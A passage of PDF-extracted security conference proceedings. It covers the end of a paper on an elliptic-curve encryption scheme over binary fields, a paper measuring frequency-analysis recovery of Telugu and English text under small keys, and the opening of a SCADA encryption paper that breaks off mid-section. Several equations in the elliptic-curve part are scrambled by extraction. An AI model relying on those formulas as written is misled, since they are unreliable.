A method that allows one to use an elliptic curve as public-key encryption system is EC El Gamal encryption. Suppose there exists message X , where X ∈ Ea,b and where X belongs to the prime subgroup. Let G be a generator of the prime subgroup of Ea,b and suppose this prime subgroup has order q. Now suppose Alice possesses X and would like to privately send it to Bob using EC El Gamal. Alice gets Bob’s public key Ybob (where Ybob = kbob G, kbob is Bob’s private key. Alice then selects a random integer r in Zq , computes rG and sets C1 = rG. Alice then computes C2 = rY + X . Alice then sends the ciphertext (C1 , C2 ) to Bob. Bob decrypts (C1 , C2 ) by computing C2 − kC1 which is the message X .

3

Applying the Isomorphism to Create an Encryption Scheme

We now introduce an a novel encryption scheme. We assume that Ea,b is a cryptographically secure elliptic curve defined over F2n , and that G is a generator of the prime subgroup of Ea,b , where this prime subgroup has order q. Suppose message M ∈ F2n and Alice would like to send this message to Bob. To transmit M to Bob, Alice does the following. She retrieves Bob’s public key Ypub,bob and certificate CERTbob . Alice verifies the validity

A Simple Encryption Scheme for Binary Elliptic Curves

277

Bob’s public key Ypub,bob using the certificate CERTbob . Upon verification Alice selects r from Zq , takes Ypub,bob and computes rYpub,bob = (xbob , ybob ). Now consider the ordered pair (xbob , M ), we will show that this belongs to a cryptographically secure elliptic curve that is isomorphic to Ea,b . Observe that since (xbob , ybob ) belongs to the subgroup of Ea,b of prime order, then xbob = 0 (if it did then this would be a point of two-torsion). Thus x−1 bob ex2 bob . Set γ = s + s, then T r(γ) = 0. Consequently, the ists. Let s = M+y xbob curve Ea,b is isomorphic to Ea+γ,b by the mapping (x, y) → (x, y + x · s), since s is a solution to Solve(γ). Consider applying this mapping to the point (xbob , ybob ), then the image will be (xbob , ybob +xbob ·s), since (xbob , ybob +xbob ·s) = bob (xbob , ybob + xbob · M+y xbob ) = (xbob , M ). Let f denote this mapping, then from above we have rYpub,bob = (xbob , ybob ) we have f (rYpub,bob ) = rf (Ypub,bob ) = f ((xbob , ybob )) = (xbob , M ). Alice sends (c1 , c2 ) = (rG, s) to Bob. This is summarized in the following algorithm. Algorithm 1. Alice encrypting message M using a simple encryption scheme 1: 2: 3: 4: 5: 6: 7:

Alice Alice Alice Alice Alice Alice Alice

selects r ∈R Z∗q randomly. computes rG. retrieves Bob’s certificate CERTBob and verifies its authenticity. acquires Bob’s public key YP ub,Bob from CERTBob . rYP ub,Bob = (xBob , yBob ). +M . computes sBob = yBob xBob send (c1 , c2 ) = (rG, sBob ) to Bob via a public communication channel.

Now we describe the decryption routine. Let kpriv,Bob denote Bob’s private key, so kpriv,Bob G = Ypub,Bob . Finally because the map from f : Ea,b → Ea+γ,b is an isomorphism, we see kpriv,Bob f (rG) = rkpriv,Bob f (G) = rf (kpriv,Bob G) = (xbob , M ). Algorithm 2. Bob’s decryption routine input: ciphertext (c1 , c2 ) = (rG, sBob ) output: message M 1: Using the isomorphism f : Ea,b → Ea+γBob ,b , compute f (rG). 2: Using the secret key kpriv,Bob , compute kpriv,Bob f (rG) = (x, y). 3: Output the y-coordinate of kpriv,Bob f (rG) = (x, y), which will be M .

A natural question to ask: “what is the impact of using the y-coordinate as the secret to represent the secret”. That is, for a given y-coordinate how many points on the elliptic curve have the same y-coordinate. We observe the following. Theorem 3. Let M be a be an element of F2n . Let x1 be a fixed field element such that T r(x1 ) = T (a) and T r(x1 + a + xb2 ) = 0 and suppose that (x1 , M ) ∈ 1 Ea+γ,b . Now consider A = {x : (x, M ) ∈ Ea+γ,b }, then 1 ≤ |A| ≤ 3.

278

B. King

The result described in Theorem 3 is straightforward to establish, since for a fixed M , the equation M 2 + xM = x3 + aM 2 + b has at least one solution and at most 3 solutions. Recall that in the case of Elliptic Curve Diffie Hellamn (ECDH), the secretkey is the x-coordinate of the elliptic curve point. For each x-coordinate of a non-trivial EC point that belongs to the prime subgroup, there are precisely two distinct EC points belonging to the prime subgroup that share this x-coordinate. Suppose that Ek ( · ) is a secure elliptic curve public-key cryptosystem for G a prime subgroup of Ea,b . Assume that the cryptosystem Ek represents random mapping from a non-trivial element of the prime subgroup to a nontrivial member of the prime subgroup. Let M represent the secret (i.e. the x-coordinate) and 2 C the ciphertext, then under this traditional method P rob(M |C) = |G|−1 . Now consider the method of using the y-coordinate to store the secret, let M represent the secret and let PM = (x1 , M ). Now let γ denote the field element as indicated in Algorithm 1. Further, let C = EK (PM ) be the ciphertext generated when we encrypt PM using Ek as it is generalized in Ea+γ,b . Again assume that the cryptosystem Ek represents random mapping from a non-trivial element of the prime subgroup to a nontrivial member of the prime subgroup. Then applying our mapping to M and assuming that Ek maps a non-trivial point of the prime 3 subgroup to a non-trivial point of the subgroup we have P rob(M |C) ≤ |G|−1 . Definition 1. Elliptic Curve Computational Diffie-Hellman Problem (EC CDH) Given elliptic curve Ea,b , G a generator of the prime subgroup of Ea,b , xG, yG, the problem is to compute xyG. The EC CDH problem is considered to be computationally hard. The following Theorem is a well-known result that ties the difficulty of breaking El Gamal and the EC CDH problem. Theorem 4. Any algorithm that solves the EC Computational Diffie Hellman problem can be used to decrypt EC El Gamal ciphertexts and any algorithm that can solve decryption of EC El Gamal ciphertexts can be used to solve the EC Computational Diffie Hellman problem Now consider the security of our simple encryption scheme (i.e. decrypting ciphertexts without the private key). Assume a ciphertext-only attack, then the adversary will have the following information available: the elliptic curve Ea,b , the generator G, the public key Ypub,bob = kG, and ciphertext (c1 , c2 ) = (rG, sbob ). The adversary’s goal is to determine M . However, we will assume that a break of the simple encryption scheme requires that the adversary computes (x1 , M ) which belongs to the elliptic curve Ea+γ,b . If we held a more strict assumption about what is a break, that is only M is known, then the adversary would have to solve a cubic equation within F2n to find the x-coordinate of the EC point. Using the assumption that a break of the simple encryption scheme requires the adversary to compute the point (x1 , M ), we have the following. Theorem 5. Any algorithm that solves the EC Computational Diffie Hellman problem (for elliptic curves defined over F2n ) can be used to solve the decryption

A Simple Encryption Scheme for Binary Elliptic Curves

279

of simple secure encryption scheme ciphertexts, and any algorithm that can solve the decryption of simple secure encryption scheme ciphertexts can be used to solve the computational Diffie Hellman problem(for elliptic curves defined over F2n ). Proof. Suppose A is an algorithm that can solve the EC Computational Diffie Hellman problem (for elliptic curves defined over F2n ). Thus A takes in as inputs: elliptic curve Ea,b , G a generator of the prime subgroup of Ea,b , kG, and rG. A will output krG. Now consider the input of elliptic curve Ea,b , G a generator of the prime subgroup of Ea,b , a public key Ypub,bob = kpriv,bob G, c1 = rG, and c2 = sbob . Feed the elliptic curve Ea,b , G a generator of the prime subgroup of Ea,b , a public key Ypub,bob = kpriv,bob G, and c1 = rG to algorithm A. Then algorithm A will output kpriv,bob rG. Let γ = s2bob + sbob . Thus T r(γ) = 0. Consequently f (x, y) = (x, y + x · sbob ) is an isomorphism that maps Ea,b to Ea+γ,b . Hence f (kpriv,bob rG) will be some point (x , y  ) such that the y-coordinate y  is M . Suppose B is an algorithm that can solve the decryption of the simple encryption scheme ciphertexts. Thus B takes in as inputs: elliptic curve Ea,b , G a generator of the prime subgroup of Ea,b , kG, rG and s. B will output (x1 , M ). Now consider the input: elliptic curve Ea,b , G a generator of the prime subgroup of Ea,b , kG, and rG. Select s ∈R F2n randomly. Let γ = s2 + s. Then T r(γ) = 0. Feed the the inputs: elliptic curve Ea,b , G a generator of the prime subgroup of Ea,b , kG, rG, and s to algorithm B. Then algorithm B will output (x , M  ). Here (x , M  ) ∈ Ea+γ,b such that f (krG) = (x , M  ) where f ((x, y)) = (x, y + x · s) is an isomorphism that maps Ea,b to Ea+γ,b . Recall that f −1 (x, y) = (x, y + x · s). Thus krG = f −1 (f (krG)) = f −1 ((x , M  )) = (x , M  + x · s). Hence the adversary has computed krG and has solved the EC CDH problem. Thus EC CDH problem (for elliptic curves defined over F2n ) is equivalent to solving the problem of decrypting simple encryption scheme ciphertexts. Since EC CDH is equivalent to EC El Gamal, we immediately can infer the equivalence of the problem of decrypting EC EL Gamal ciphertexts and decrypting simple encryption scheme ciphertexts. The homomorphic encryption properties of EL Gamal and EC El Gamal public-key encryption are well-known. That is, for EC El Gamal EN CEL Gamal (M1 ) = (r1 G, M1 + kpriv,bob r1 G). Then EN CEL Gamal (M1 ) · EN CEL Gamal (M2 ) = (r1 G, M1 + kpriv,bob r1 G) · (r2 G, M2 + kpriv,bob r2 G) = (r1 G + r2 G, M1 + M2 + kpriv,bob r1 G + kpriv,bob r2 G) = EN CEL Gamal (M1 + M2 ).

Observe that our simple encryption scheme EN C(M ) = (rG, sbob ) where +M rkpriv,bob G = (xbob , ybob ) and s = ybob is not a homomorphic encryption. xbob This follows from the fact that EN C(M1 ) · EN C(M2 ) = (r1 G, s1 ) · (r2 G, s2 ) y +Mi = (r1 G + r2 G, s1 + s2 ) = EN C(M1 + M2 ). Then for i = 1 and 2, si = bob,i xbob,i y

+M

y

+M

1 2 where (xbob,i , ybob,i ) = kpriv,bob ri G. Thus s1 + s2 = bob,1 + bob,2 xbob,1 xbob,2 . Now EN C(M1 + M2 ) = (r G, s ), so if EN C(M1 + M2 ) = EN C(M1 ) · EN C(M2 ), then r G = (r1 + r2 )G and s = s1 + s2 . However, for the simple encryption

280

B. King

scheme to be homomorphic, s would have to satisfy s = y3 +Mx13+M2 where the point (x3 , y3 ) is the sum of the EC points kpriv,bob r1 G + kpriv,bob r2 G. By the sum of two EC point formula we have s1 + s2 = y3 +Mx13+M2 where the point (x3 , y3 ) is the sum of the EC points kpriv,bob r1 G + kpriv,bob r2 G and so the simple encryption scheme is not homomorphic.

4

Conclusion

In this paper we have discussed elliptic curve cryptography for elliptic curves Ea,b defined over F2n . We have discussed a well-known isomorphism that maps Ea,b to Ea+γ,b . Further, we have discussed how to use the isomorphism to construct a simple encryption scheme that is equivalent to EC El Gamal.

References 1. Blake, I.F., Smart, N., Seroussi, G.: Elliptic Curves in Cryptography. London Mathematical Society Lecture Note Series. Cambridge University Press, Cambridge (1999) (2001) 2. Gaudry, P., Hess, F., Smart, N.: Constructive and Destructive Facets of Weil Descent on Elliptic Curves. Journal of Cryptology 15(1), 19–46 (2002) 3. Lidl, R., Niederreiter, H.: Finite Fields, 2nd edn. Cambridge University Press, Cambridge (1997) 4. Lopez, J., Dahab, R.: Improved Algorithms for Elliptic Curve Arithmetic in GF (2n )”. In: Tavares, S., Meijer, H. (eds.) SAC 1998. LNCS, vol. 1556, pp. 201–212. Springer, Heidelberg (1999) 5. Mao, W.: Modern Cryptography Theory and Practice. Prentice Hall, New York (2004) 6. Miller, V.S.: Use of Elliptic Curves in Cryptography. In: Williams, H.C. (ed.) CRYPTO 1985. LNCS, vol. 218, pp. 417–426. Springer, Heidelberg (1986) 7. NIST, Recommended elliptic curves for federal use, http://www.nist.gov 8. Seroussi, G.: Compact Representation of Elliptic Curve Points over F2 n , HP Labs Technical Reports, pp. 1–6, http://www.hpl.hp.com/techreports/98/HPL-98-94R1.html 9. Silverman, J.: The Arithmetic of Elliptic Curves. Springer, New York (1986) 10. Trappe, W., Washington, L.C.: Introduction to Cryptography with Coding Theory, 2nd edn. Prentice Hall, Englewood Cliffs (2006) 11. Institute for Electrical and Electronics Engineers (IEEE) Standard 1363-2000, Standard Specifications for Public Key Cryptography (January 2000)

Analysis of Text Complexity in a Crypto System – A Case Study on Telugu M.S.V.S. Bhadri Raju1, B. Vishnu Vardhan2, G.A. Naidu3, L. Pratap Reddy4, and A. Vinaya Babu5 1

Associate Professor of CSE, S.R.K.R. Engineering College, Bhimavaram, A.P., India msramaraju@ gmail.com 2 Professor & Head of CSE, Indur Institute of Engg & Tech.., Siddipet, A.P., India mailvishnu@ yahoo.com 3 Research Scholar, Dept of CSE, JNTU Kakinada, Kakinada A.P., India [email protected] 4 Professor & Head of ECE, Jawaharlal Nehru Technological University, Hyderabad prataplr@ rediffmail.com 5 Professor of CSE & Director, Admissions, JNTUniversity, Hyderabad, A.P., India [email protected]

Abstract. Global connectivity provided praxis for data transactions. Data or information is available in different forms like text, image, audio, video etc. Security mechanisms are aimed at security algorithms with an assumption that the information is in bit stream. Human perception deals with information other than bit stream. In the transaction process of information, users allow human understandable format of data. A simple case of text data deals with multiple scripts represented in multiple combinations of bit streams. Transformation of basic characteristics that are embodied in the script is an interesting area to be explored in security models. The present work is aimed at analyzing the basic characteristics of a script in the form of frequency distribution of character code points. The proposed model is evaluated on Telugu script as a case study with a comparison on Latin text. The evaluation is limited to 8-bit and 16-bit key sizes. Keywords: Bit Stream, Frequency Distribution, Character Code Points, Script.

1 Introduction Secured communication is a challenging task with so many languages in the world consisting of various characters of different properties and behavior. Cryptography is one of the methods in which the security goals can be achieved by means of encryption and decryption. In general, such scheme uses symmetric key algorithm or asymmetric algorithm where each block of fixed/variable size bit stream will be transformed to cipher stream. They use either block cipher or stream cipher techniques for transformation. Parameters in these schemes are mainly associated with algorithm and key. These algorithms are evaluated adequately on ASCII based Latin text. To attain greater levels of security, emphasis is made on incremental increase in the key size. The reflected result can be found with increased hardware D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 281–288, 2009. © Springer-Verlag Berlin Heidelberg 2009

282

M.S.V.S.B. Raju et al.

complexity. Introduction of Unicode allowed unique representation of all characters of script based languages in the world. The process of localization [1] took a gallop with increasing trends in the information exchange of language dependent content. This phenomena demands for security systems that are specific to script. In this scenario the characteristics of text play a vital role, which need to be considered as a parameter. Transformation of text during the cryptographic process is to be analyzed for various levels of security. A simple logical conclusion may state that if the text of a script is complex, then the same level of security may be achieved with smaller key size. In this paper we addressed the information security issues related to Indic scripts with an emphasis on complexity of Telugu [2,3] which is mainly used in the southern region of India and ranks second among Indian Languages.

2 Review Different approaches of cryptanalysis are available in literature adopting language characteristics to understand the strength of cipher system. One such approach deals with frequency analysis, where in the process of determining the frequency of each symbol in the encrypted message leads to prediction of plain text. This information is used along with knowledge of symbol frequencies in the language, to help determine which cipher text symbol maps to the respective plaintext symbol. Success may vary based on the amount of available information about the cryptosystem. In transposition systems, the symbol frequencies of a cryptogram are identical to that of the plaintext. In the simplest substitution systems, each plaintext symbol has one equivalent in cipher text. These symbol frequencies are not identical to the plaintext frequencies, but the same numbers will be present in the frequency count as a whole. K.W. Lee et.al developed [4] the cryptanalytic technique of enhanced frequency analysis using the combined techniques of monogram frequencies, keyword rules and dictionary checking. The proposed three-tier approach mechanizes the cryptanalysis of mono alphabetic simple substitution cipher. Thomas Jakobsen proposed [5] a method for fast cryptanalysis of substitution ciphers, which uses the knowledge of digram distribution of cipher text. The study of encrypted messages are subdivided into determination of language, reconstruction of keys and or the plaintext. Recent approaches in literature are being concentrated on retrieval of plain text based on the features of respective language. Each language has certain characteristics [6,7] that aid in successful cryptanalysis. There are two general approaches to solve simple ciphers. One makes use of the frequency characteristics and the other uses the orderly progression of the alphabet to generate all possible decipherments from which the correct plaintext can be picked up. For example, the individual letters of any language occur with greatly varying frequencies [8]. Similar to that of single letters with typical frequency expectations, multiple letter combinations also found with varying, but predictable frequencies. Extensive statistical analysis of these frequencies is more helpful while retrieving part of plain text message. Bárbara E. et al presented a method [9] for de-ciphering texts in Spanish using the probability of usage of letters in the language. The frequency of different letters is the clue to the proposed de-ciphering. Bao-Chyuan et al proposed [10] a method to

Analysis of Text Complexity in a Crypto System – A Case Study on Telugu

283

improve the encryption of oriental language texts with a case study on Chinese text files, which are ideogram based and differ from Latin text. Moreover the number of characters that appear in Chinese are much larger when compared to English. The scheme proposed by Bao reported that large Chinese text can be handled more efficiently. A method for Parisian/Arabic script is proposed [11] with regard to shapes and their position in the word. In another Model, stegnography is attempted [12] on Persian/Arabic Unicode based Text using the above characteristics including writing system. In the present paper the frequency characteristics of character code points are explored.

3 Security Model Every language has certain parameters in such a way that language rules are embodied in sequence while formulating document. Complexity of script is mainly dependent on character, word and sentence formulation methods. A document with a meaningful summary can be represented as D ⊂ S ⊂ W ⊂ C where ‘D’ is document, ’S’,’W’ and ‘C’ are sentences, words and characters respectively. In case of English, ‘C’ is represented with the help of one-to-one correspondence of character code points in any machine, where as Indic script representation is associated with two fold phenomena. ‘C’ in real terms is associated with ‘Syllable’ which in turn represented as a set of multiple character code points. Now ‘C’ can be written as Sy ⊂ CC where ‘Sy’ is syllable and ‘CC’ is character code point. In actual transformation, the character code points are transformed with the help of crypto system. This transformation is done onto a different plane where the mapping is a reversible phenomenon. The transformation characteristics of the meaningful units from the stand point of the frequency characteristics, is a point of interest in the present work. Generally, the frequency characteristics differ from language to language. In case of English due to the smaller size of the character set, the frequency characteristics may effectively be reflected in the transformed data. If the size of the meaningful units is large enough, then complexity of frequency characteristics is to be evaluated. In the mapping phenomena, we have attempted to understand the reflection of frequency characteristics and its impact in cryptanalysis. This is the context in which the present work is addressed. The proposed model defines meaningful units that are embedded in text documents [9] as essential units and also treated as meaningful units in the form of character or byte stream. The byte stream is a symbolic representation of text. In case of Indic scripts this stream is a complex byte stream, where as in case of Latin text the byte stream is one-to-one mapping. The present model addressed this specificity by taking into consideration of words in the form of syllables and extraction of byte stream from syllables. They consist of single code point units or multiple code point units. They will be transformed into a code point byte stream, converted into bit stream which undergoes transformation similar to that of any system. The code point streams that are derivative of syllables are converted to bit stream. A key stream is generated using efficient Random number generator. Simple 8-bit and 16-bit key streams are used in the present work. With this key stream, transformation function is applied on this bit stream resulting in cipher text as illustrated in Fig.1 and Fig.2.

284

M.S.V.S.B. Raju et al.

Original Plain Text stream

Transformation function

Encrypted Text stream

Fig. 1. Encryption of Original Plain Text

Estimated Plain Text

Function of frequency characteristics

Encrypted Text stream

Fig. 2. Estimated Plain Text using frequency characteristics

Fig. 3. Sample Plain Text, Encrypted Text and Decrypted Text in Telugu

A simple plain text, encrypted text followed by the decrypted text of English and Telugu languages are performed and presented in Fig.3.

4 Frequency Distribution of Character Code Points of Telugu Script Basic unit of script description is found with syllable, which is defined by the canonical structure ((C)C)CV. Machine representation of this structure is composed of a set of character code points that are defined in the Unicode code chart. Even

Analysis of Text Complexity in a Crypto System – A Case Study on Telugu

285

though syllables are the meaningful units of script, they are abided by the specific grammar rules of the script, whereas the character code points in machine representation are perceived as a reflective mechanism of these grammar rules. It is necessary to understand the complex nature of the script in the utility nature of the syllables, which is dynamic in historical perspective. In the present work we are considering the machine representation of character code points and their characteristics in the form of frequency distribution as one of the information that is adopted for the crypto analysis. Many attempts are made on Latin text while extracting the frequency distribution of basic alphabets in a sample of over 300,000 character code points. They demonstrated the dominance of a small set of characters in regular usage. Similar concept is extended in the present work to evaluate the characteristic nature of variable character code points that are embodied in syllables of Telugu text. A sample of 2,400,000 character code points is used for the above analysis which is mainly compiled from the present usage of text.

5 Crypto Analysis Using Frequency Distribution The proposed model is evaluated for two languages i.e. English and Telugu. The encryption algorithm is implemented on different sizes of Telugu text samples. For this process an 8- bit key is generated randomly using OS based random generator. Plain text is encrypted using the proposed algorithm and randomly generated 8-bit key resulting in cipher text. The frequencies of different characters in the cipher text are extracted. Mapping is carried out between the characters of plain text and cipher text based on these frequencies. Now the characters in cipher text are replaced with the mapped characters of plain text and the percentage of the exact retrieval as compared to plain text is calculated. When English Text is considered, the problems are much less because, the correspondence is between the transformed text and the original text. Though the key is generated randomly, since it is fixed, the mapping function transforms it into a point in orthogonal plane. The percentage of retrieved code points using frequency distribution is calculated. If we consider Telugu script the number of character codes that exist in the original medium size text need not be the complete set. In the transformation process all character codes may not exist from the original set of code points. This may lead to confusion in crypto analysis. We adopted threshold function in the crypto analysis process for reverse mapping. The percentage of plain text that can be retrieved is observed in the range of 10% to 20% depending on the size of the plain text in case of Telugu. The same process is adopted on English text of different sizes. The percentage of plain text that can be retrieved is varying from 25% to 50% depending on the size of the plain text which is illustrated in Table1. This percentage in case of Telugu is relatively less when compared to English, which is because of the increased complexity involved in Telugu script. The proposed cryptographic model is extended further with 16-bit key on Telugu using the above mentioned approach. Mapping is carried out between the characters of plain text and cipher text. Now the characters in cipher text are replaced with the mapped characters of plain text and the percentage of the exact retrieval as compared to plain text is calculated, which is illustrated in Fig.4 and Table2.

286

M.S.V.S.B. Raju et al.

Fig. 4. Retrieved Text based on Frequency distribution in Telugu

The results indicate that the percentage of retrieved plain text is now found in the range of 1-10% only. Reduced efficiency of mapping is an indicative measure of language complexity with specific reference to frequency distribution of character code points. Table 1. Percentage of retrieved character code points using frequency distribution for English and Telugu with 8-bit key

Plain Text Size Number of characters 2000 4000 10000 15000 22000 35000 64000 75000

% of character code points retrieved English Telugu 24.43 20.7 49.49 17.1 27.12 8.5 50.89 16.7 41.09 15.05 41.04 15.89 46.81 1.15 31.99 1.94

Analysis of Text Complexity in a Crypto System – A Case Study on Telugu

287

Table 2. Percentage of retrieved character code points using frequency distribution for Telugu with 8-bit and 16-bit keys

Plain Text Size Number of characters 2000 4000 10000 15000 22000 35000 64000 75000

% of character code points retrieved using 8-bit key 16-bit key 20.7 4.4 17.1 2.05 8.5 7.3 16.7 4.47 15.05 9.97 15.89 4.31 1.15 0.8 1.94 1.2

6 Conclusions The complex orthographic nature of Indic scripts is explored while studying the impact of frequency distribution of Telugu character code points in the cryptanalysis of text retrieval. An extensive analysis is carried out on a large set of character code points of Telugu script compiled from the present usage of script. Randomly generated 8-bit and 16-bit keys are applied on a simple encryption model for the present study. A comparison between language complexities of English and Telugu is carried out from the stand point of frequency distribution of character code points while adopting cryptanalysis. Different sizes of plain text, varying from 2,000 to 75,000 characters are used for the above purpose. Reverse mapping of plain text from the encrypted text is observed to be a maximum of 51% and 21% with reference to English and Telugu respectively. However the minimum levels of reverse mapping in a similar approach is observed to be 27% and 1% respectively. From the observed results it is easy to infer that the reverse mapping is more complex in case of Indic scripts (specific reference to Telugu) with smaller key sizes also. The extended observations with regard to the increase in key size reflected the fact that the reverse mapping is much more complex. Exploration of n-gram characteristics and further evaluation of the complexities of Indic scripts is in progress.

Acknowledgments This work was supported in part by Information Technology & Communication department, Government of Andhra Pradesh under grant G.O. M.S. No. 5.

References 1. Stone, A.: Internationalizing the Internet. J. Internet Computing 3, 11–12 (2003) 2. Pratap Reddy, L.: A New Scheme for Information Interchange in Telugu through Computer Networks: Doctoral Thesis. JNTU, Hyderabad, India (2001)

288

M.S.V.S.B. Raju et al.

3. Vishnu Vardhan, B.: Analysis of N Gram Model on Telugu Document Classification. Doctoral Thesis. JNTU, Hyderabad, India (2007) 4. Lee, K.W., Teh, C.E., Tan, Y.L.: Decrypting English Text Using Enhanced Frequency Analysis. In: National Seminar on Science, Technology and Social Sciences (UiTM-STSS 2006), pp. 1–7 (2006) 5. Jakobsen, T.: A fast Method for Cryptanalysis of Subsittution Ciphers. J. Cryptologia XIX 3, 265–274 (1995) 6. Bauer, F.L.: Decrypted secrets-Methods and Maxims of Cryptology. Springer, Heidelberg (2007) 7. Menezes, A.J.P.: Handbook of Applied Cryptography. CRC Press, Boca Raton (2001) 8. De Canniere, C., Biryukov, A., Preneel: An Introduction to Block Cipher Cryptanalysis. J. IEEE 94(2) (2006) 9. Bárbara, E., Rinza, S., Alejandra, D., Zavala, B., Chavez, A.C.: De-encryption of a text in spanish using probability and statistics. In: 18th IEEE International Conference on Electronics, Communications and Computers, pp. 75–77 (2008) 10. Guan, B.-C., Chang, R.-I., Wei, Y.C., Hu, C.-L., Chiu, Y.-L.: An encryption scheme for large Chinese texts. In: IEEE 37th Annual 2003 International Carnahan Conference on Security Technology, Taipei, Taiwan, pp. 564–568 (2003) 11. Shirali-Shahreza, M.H., Shirali-Shahreza, M.: Steganography in Persian and Arabic Unicode Texts Using Pseudo-Space and Pseudo-Connection Characters. J. Theoretical and Applied Information Technology (JATIT) 8, 682–687 (2008) 12. Shirali-Shahreza, M.H., Shirali-Shahreza, M.: A New Approach to Persian/Arabic Text Steganography. In: 5th IEEE/ACIS International Conference on Computer and Information Science (ICIS 2006), Honolulu, HI, USA, pp. 310–315 (2006)

Symmetric-Key Encryption for Wireless Internet SCADA Rosslin John Robles and Min-Kyu Choi Multimedia Engineering Department, Hannam University, Daejeon, Korea [email protected], [email protected]

Abstract. Traditionally SCADA is connected only in a limited private network. With new technology and facilities, there are also demands of connecting SCADA though the internet. The internet SCADA facility has brought a lot of advantages in terms of control, data viewing and generation. Aside from connecting SCADA to the internet, there are also operators who want to connect their system wirelessly. This can save budget for communication lines. Along with the advantages it brings, are security issues regarding wireless internet SCADA. In this paper, we discuss internet SCADA, its connection through wireless communication and the security issues surrounding it. To answer the security issues, a symmetric-key encryption for wireless internet SCADA is proposed. Keywords: SCADA, Security Issues, Internet, Wireless.

1 Introduction SCADA like other Control Systems have been so important since it control most of our commodities. Traditional SCADA communications has been Point-to-Multipoint serial communications over lease line or private radio systems. With the advent of Internet Protocol (IP), IP Technology has seen increasing use in SCADA communications. The connectivity of the Internet can give SCADA more scale which enables it to provide access to real-time data display, alarming, trending, and reporting from remote equipment. Wireless communication is the transfer of information over a distance without the use of electrical conductors or wires. [1] Wireless technology can also be applied to SCADA especially when it is connected through the internet. It can save a lot of budget for communication lines. On the Next parts of this paper, SCADA is discussed, the conventional setup, Internet SCADA and the wireless SCADA. Advantages which can be attained using wireless technology for Internet SCADA are also covered. Security issues are being pointed out. We proposed a Symmetric-key encryption for Wireless Internet SCADA security.

2 SCADA Defined SCADA is an acronym that stands for Supervisory Control and Data Acquisition. SCADA refers to a system that collects data from various sensors at a factory, plant or D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 289–297, 2009. © Springer-Verlag Berlin Heidelberg 2009

290

R.J. Robles and M.-K. Choi

in other remote locations and then sends this data to a central computer which then manages and controls the data. SCADA is a term that is used broadly to portray control and management solutions in a wide range of industries. Some of the industries where SCADA is used are Water Management Systems, Electric Power, Traffic Signals, Mass Transit Systems, Environmental Control Systems, and Manufacturing Systems. One of key processes of SCADA is the ability to monitor an entire system in real time. This is facilitated by data acquisitions including meter reading, checking statuses of sensors, etc that are communicated at regular intervals depending on the system. Besides the data being used by the RTU, it is also displayed to a human that is able to interface with the system to override settings or make changes when necessary. SCADA can be seen as a system with many data elements called points. Usually each point is a monitor or sensor. Usually points can be either hard or soft. A hard data point can be an actual monitor; a soft point can be seen as an application or software calculation. Data elements from hard and soft points are usually always recorded and logged to create a time stamp or history There are many parts of a working SCADA system. A SCADA system usually includes signal hardware (input and output), controllers, networks, user interface (HMI), communications equipment and software. All together, the term SCADA refers to the entire central system. The central system usually monitors data from various sensors that are either in close proximity or off site. Typically SCADA systems include the following components: [2] 1. Instruments in the field or in a facility that sense conditions such as pH, temperature, pressure, power level and flow rate. 2. Operating equipment such as pumps, valves, conveyors and substation breakers that can be controlled by energizing actuators or relays. 3. Local processors that communicate with the site’s instruments and operating equipment. This includes the Programmable Logic Controller (PLC), Remote Terminal Unit (RTU), Intelligent Electronic Device (IED) and Process Automation Controller (PAC). A single local processor may be responsible for dozens of inputs from instruments and outputs to operating equipment. 4. Short range communications between the local processors and the instruments and operating equipment. These relatively short cables or wireless connections carry analog and discrete signals using electrical characteristics such as voltage and current, or using other established industrial communications protocols. 5. Host computers that act as the central point of monitoring and control. The host computer is where a human operator can supervise the process; receive alarms, review data and exercise control. 6. Long range communications between the local processors and host computers. This communication typically covers miles using methods such as leased phone lines, satellite, microwave, frame relay and cellular packet data. 2.1 SCADA Hardware and Software SCADA systems are an extremely advantageous way to run and monitor processes. They are great for small applications such as climate control or can be effectively

Symmetric-Key Encryption for Wireless Internet SCADA

291

used in large applications such as monitoring and controlling a nuclear power plant or mass transit system. [3] SCADA can come in open and non proprietary protocols. Smaller systems are extremely affordable and can either be purchased as a complete system or can be mixed and matched with specific components. Large systems can also be created with off the shelf components. SCADA system software can also be easily configured for almost any application, removing the need for custom made or intensive software development. 2.2 HMI A SCADA system includes a user interface, usually called Human Machine Interface (HMI). The HMI of a SCADA system is where data is processed and presented to be viewed and monitored by a human operator. This interface usually includes controls where the individual can interface with the SCADA system. [3] HMI's are an easy way to standardize the facilitation of monitoring multiple RTU's or PLC's (programmable logic controllers). Usually RTU's or PLC's will run a pre programmed process, but monitoring each of them individually can be difficult, usually because they are spread out over the system. Because RTU's and PLC's historically had no standardized method to display or present data to an operator, the SCADA system communicates with PLC's throughout the system network and processes information that is easily disseminated by the HMI. HMI's can also be linked to a database, which can use data gathered from PLC's or RTU's to provide graphs on trends, logistic info, schematics for a specific sensor or machine or even make troubleshooting guides accessible. In the last decade, practically all SCADA systems include an integrated HMI and PLC device making it extremely easy to run and monitor a SCADA system.

3 Installation of SCADA SCADA is traditionally set upped in a private network not connected to the internet. This is done for the purpose of isolating the confidential information as well as the control to the system itself. Due to the distance, processing of reports and the emerging technologies, SCADA can now be connected to the internet. This can bring a lot of advantages and disadvantages which will be discussed in the later part of this paper. 3.1 Conventional SCADA The function of SCADA is collecting of the information, transferring it back to the central site, carrying out any necessary analysis and control and then displaying that information on a number of operator screens. Systems automatically control the actions and control the process of automation. Conventionally, relay logic was used to control production and plant systems. With the discovery of the CPU and other electronic devices, manufacturers incorporated digital electronics into relay logic equipment. Programmable logic controllers or

292

R.J. Robles and M.-K. Choi

Fig. 1. Common SCADA Installation utilizing PLC/DCS, Sensors and Master Station connected using a fieldbus

PLC's are still the most widely used control systems in industry. As need to monitor and control more devices in the plant grew, the PLCs were distributed and the systems became more intelligent and smaller in size. PLCs(Programmable logic controllers) and DCS (distributed control systems) are used as shown in figure 1.

4 Wireless SCADA Wireless SCADA is required in those applications when wireline communications to the remote site is prohibitively expensive or it is too time consuming to construct wireline communications. In particular types of industry like Oil & Gas or Water & Wastewater, wireless SCADA is often the only solution due to the remoteness of the sites. [4] The typical wireless SCADA architecture is Point-Multipoint with one Master polling multiple remote RTU’s (Remote Terminal Units) or PLC's using RTU or PLC data communication protocols including protocols such as Modbus, AB-DF1, and DNP3.0. Each PLC or RTU at the remote site is programmed with a unique system address and those addresses are all configured into the SCADA Host MMI. The SCADA Host then polls these addresses and stores the acquired data into its database. It will perform centralized alarm management, data trending, operator display and control.

